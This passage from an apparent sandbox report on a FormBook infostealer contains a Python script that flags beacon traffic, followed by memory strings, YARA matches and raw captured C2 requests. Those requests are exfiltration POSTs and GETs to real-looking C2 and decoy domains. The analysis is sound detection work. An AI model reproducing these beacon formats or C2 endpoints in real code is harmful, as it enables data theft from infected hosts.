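The captures above show the FormBook beacon shape. Every request uses the one URI path from the extracted configuration (/p12s/) but rotates the Host header through domains from the config, with a www. prefix added (tyz.world and madurababe.net are both in the decoy list, and the connections are made from explorer.exe). The GETs carry two short-named query parameters (q88dJ and 3f) and no User-Agent; the POSTs use the IE11 "Trident/7.0; rv:11.0" User-Agent, Connection: close, an Origin and Referer that point back at the same host and path, and a form body whose parameter name (3f) matches the second GET parameter. The same two POST sizes (Content-Length 408 and 148780) are sent to both hosts, and the one server that answered returned 403. The Python below is an added example, not part of the Joe Sandbox report. It parses raw requests, tags each against these traits and the extracted configuration, and flags POSTs of identical size replayed to several hosts. The request texts are rebuilt from the captures above with their bodies shortened, the decoy list is cut to four entries, the apache.org request is constructed for contrast, and the heuristics, thresholds and tag names are this example's own assumptions.

```python
"""Score captured HTTP requests against FormBook beacon traits and an extracted config.

Added example, not part of the sandbox report.  Requests are rebuilt from the
report's captures (bodies shortened, decoy list abbreviated); the heuristics, tag
names and the benign apache.org request are this example's own assumptions.
"""
import re
from collections import defaultdict

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"

FORMBOOK_CONFIG = {  # from the report's configuration extractor, decoys abbreviated
    "C2 list": ["www.mybenefitassist.com/p12s/"],
    "decoy": ["tyz.world", "madurababe.net", "kaylaspann.com", "miumiu-turkey.com"],
}


def post(host: str, length: int, body: str) -> str:
    """Rebuild one captured POST; header order and values follow the report."""
    return (f"POST /p12s/ HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n"
            f"Content-Length: {length}\r\nCache-Control: no-cache\r\nOrigin: http://{host}\r\n"
            f"User-Agent: {IE11_UA}\r\nContent-Type: application/x-www-form-urlencoded\r\n"
            f"Accept: */*\r\nReferer: http://{host}/p12s/\r\nAccept-Language: en-US\r\n"
            f"Accept-Encoding: gzip, deflate\r\n\r\n{body}")


CAPTURED = [
    "GET /p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA HTTP/1.1\r\n"
    "Host: www.tyz.world\r\nConnection: close\r\n\r\n",
    "GET /p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd HTTP/1.1\r\n"
    "Host: www.madurababe.net\r\nConnection: close\r\n\r\n",
    post("www.tyz.world", 408, "3f=0Iq2IvxcyZ8kjnO8uZ4N~6wgmksX(GSsqUIqkjAVw41EF4iFAPz22a6dnbfQ46Q47hEx"),
    post("www.tyz.world", 148780, "3f=0Iq2IrFI0po5xB~_pZoFvLB9kXYf4VvVnkk6kmJS9cxJToSFQ9bxw66elbfRprtN7yU5"),
    post("www.madurababe.net", 408, "3f=jb4xiMTxb4q16b8Egkmd8DKvEvQT1KpTkE8533rbyfxSdpV47dZyP0X3gRwEVMBIQTpC"),
    post("www.madurababe.net", 148780, "3f=jb4xiIOKZpe_xOtjh3eF4C6DAv9f89Eitztn30zf56UNXZF4vvA6Q0X0xhwFesEoOz"),
    # Constructed benign request, not from the report, to show a non-match.
    "GET /licenses/LICENSE-2.0 HTTP/1.1\r\nHost: www.apache.org\r\nUser-Agent: curl/8.0\r\n\r\n",
]


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers, "body": body}


def norm_host(host: str) -> str:
    """FormBook prefixes every configured domain with www.; compare without it."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def classify(req: dict, config: dict) -> list:
    """Tags describing how closely one request matches the captured FormBook traffic."""
    h, host, tags = req["headers"], norm_host(req["headers"].get("host", "")), []
    if req["path"] in {"/" + e.split("/", 1)[1] for e in config["C2 list"] if "/" in e}:
        tags.append("c2-path")
    if host in {norm_host(e.split("/", 1)[0]) for e in config["C2 list"]}:
        tags.append("config-c2")
    elif host in {norm_host(d) for d in config["decoy"]}:
        tags.append("config-decoy")
    if h.get("user-agent") == IE11_UA and h.get("connection", "").lower() == "close":
        tags.append("formbook-ua")
    if req["method"] == "GET" and req["query"]:
        pairs = [p.split("=", 1) for p in req["query"].split("&")]
        short_names = all(len(p) == 2 and re.fullmatch(r"[A-Za-z0-9]{2,6}", p[0]) for p in pairs)
        if len(pairs) == 2 and short_names and max(len(p[1]) for p in pairs) >= 40:
            tags.append("formbook-get-shape")  # two short-named params, one long encoded value
    if req["method"] == "POST":
        self_origin = h.get("origin") == "http://" + h.get("host", "")
        self_referer = h.get("referer") == "http://" + h.get("host", "") + req["path"]
        form = h.get("content-type") == "application/x-www-form-urlencoded"
        if form and self_origin and self_referer and re.match(r"[A-Za-z0-9]{2}=", req["body"]):
            tags.append("formbook-post-shape")
    return tags


def replayed_posts(reqs: list) -> dict:
    """(path, Content-Length) -> hosts, for POST bodies of identical size sent to 2+ hosts."""
    seen = defaultdict(set)
    for r in reqs:
        if r["method"] == "POST" and "content-length" in r["headers"]:
            seen[(r["path"], int(r["headers"]["content-length"]))].add(norm_host(r["headers"]["host"]))
    return {key: hosts for key, hosts in seen.items() if len(hosts) >= 2}


if __name__ == "__main__":
    reqs = [parse_request(r) for r in CAPTURED]
    for r in reqs:
        print(r["method"], r["headers"].get("host"), r["path"], classify(r, FORMBOOK_CONFIG))
    for (path, length), hosts in replayed_posts(reqs).items():
        print(f"POST {path} with Content-Length {length} replayed to {sorted(hosts)}")
```

The path and host checks are the only ones tied to this sample's configuration; the GET and POST shape checks and the replay grouping describe the traffic pattern itself and can be kept when the configured path and domain list change. Because the report shows the traffic originating from explorer.exe, host telemetry should be keyed on that process rather than on the original PO#12108997.exe.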
Source: PO#12108997.exe, 00000000.00000003.241230450.00000000062C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://en.w
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: PO#12108997.exe, 00000000.00000002.274185090.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.269352701.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comB
Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comF
Source: PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.coma
Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comalic
Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comals
Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comd
Source: PO#12108997.exe, 00000000.00000002.274185090.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.269352701.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comicta
Source: PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comiono?
Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.commsed
Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com~
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: PO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PO#12108997.exe, 00000000.00000003.243309494.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnal
Source: PO#12108997.exe, 00000000.00000003.243309494.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnd
Source: PO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnr-ca
Source: PO#12108997.exe, 00000000.00000003.243438855.00000000062C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnt-p
Source: PO#12108997.exe, 00000000.00000003.243228061.00000000062C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnu
Source: PO#12108997.exe, 00000000.00000003.253530830.00000000062F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/$
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/?
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/G
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/L
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/c
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/h
Source: PO#12108997.exe, 00000000.00000003.245991530.00000000062CB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.245810914.00000000062CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/z
Source: cmmon32.exe, 00000011.00000002.504383101.0000000005219000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.madurababe.net
Source: cmmon32.exe, 00000011.00000002.504383101.0000000005219000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.madurababe.net/p12s/
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.240907648.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.240907648.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244685656.00000000062DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com2
Source: PO#12108997.exe, 00000000.00000003.241240509.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242020102.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242298077.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241386764.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242155076.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241133770.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244167008.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241930231.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241914109.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244243490.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241066392.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242447746.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242243715.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241718185.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242052403.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241637382.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.241432507.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242670683.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244713421.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.244685656.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.242576157.00000000062DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.comt
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: cmmon32.exe, 00000011.00000002.504685915.000000000558F000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD
Source: unknown HTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.tyz.worldConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.tyz.worldUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tyz.world/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 30 49 71 32 49 76 78 63 79 5a 38 6b 6a 6e 4f 38 75 5a 34 4e 7e 36 77 67 6d 6b 73 58 28 47 53 73 71 55 49 71 6b 6a 41 56 77 34 31 45 46 34 69 46 41 50 7a 32 32 61 36 64 6e 62 66 51 34 36 51 34 37 68 45 78 59 6a 54 68 38 47 34 54 65 34 79 76 74 53 31 4e 38 56 6f 6c 35 6f 58 64 56 6e 39 55 71 64 53 56 36 48 33 49 43 77 53 4f 67 34 63 73 68 49 4c 46 53 47 4b 70 48 52 7a 57 6c 6c 63 41 66 64 62 48 74 4b 75 30 63 31 41 6c 59 44 66 54 6d 33 46 47 30 39 4a 4e 75 48 36 30 66 58 67 51 46 31 38 43 62 50 65 31 6c 76 77 37 46 49 6d 4f 4d 34 37 42 34 67 43 48 36 65 4d 56 67 74 78 5f 45 4f 42 69 56 52 58 4b 64 67 66 30 6c 33 37 53 36 42 54 70 39 32 32 5f 68 64 6f 78 4e 6d 43 55 4e 43 76 38 30 37 4d 4d 47 57 44 51 4d 54 48 75 74 66 77 75 62 5a 56 63 4b 43 64 48 72 47 52 46 50 51 73 67 71 73 78 53 46 43 4a 4c 63 49 65 41 31 36 28 65 47 48 37 55 6e 57 79 4b 68 38 6c 5f 39 55 56 44 73 4d 37 72 4e 52 38 33 72 42 57 46 6f 46 75 56 72 52 71 79 33 68 45 36 78 52 68 6e 4c 6c 28 69 32 6a 32 37 55 66 4d 75 44 51 71 38 62 55 47 42 42 6d 77 5f 61 33 47 53 56 41 47 51 56 41 57 6e 64 72 74 37 77 7a 37 4e 49 5f 42 62 69 59 6b 61 7e 65 47 48 57 6b 73 5a 7a 35 38 71 55 51 7a 53 57 76 74 47 75 65 59 73 4a 6a 4e 44 35 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3f=0Iq2IvxcyZ8kjnO8uZ4N~6wgmksX(GSsqUIqkjAVw41EF4iFAPz22a6dnbfQ46Q47hExYjTh8G4Te4yvtS1N8Vol5oXdVn9UqdSV6H3ICwSOg4cshILFSGKpHRzWllcAfdbHtKu0c1AlYDfTm3FG09JNuH60fXgQF18CbPe1lvw7FImOM47B4gCH6eMVgtx_EOBiVRXKdgf0l37S6BTp922_hdoxNmCUNCv807MMGWDQMTHutfwubZVcKCdHrGRFPQsgqsxSFCJLcIeA16(eGH7UnWyKh8l_9UVDsM7rNR83rBWFoFuVrRqy3hE6xRhnLl(i2j27UfMuDQq8bUGBBmw_a3GSVAGQVAWndrt7wz7NI_BbiYka~eGHWksZz58qUQzSWvtGueYsJjND5A).
Source: unknown DNS traffic detected: queries for: www.tyz.world
Source: global traffic HTTP traffic detected: GET /p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA HTTP/1.1Host: www.tyz.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd HTTP/1.1Host: www.madurababe.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: PO#12108997.exe, 00000000.00000002.270009713.000000000180A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Windows\SysWOW64\cmmon32.exe Dropped file: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\cmmon32.exe Dropped file: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogrv.ini Jump to dropped file
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
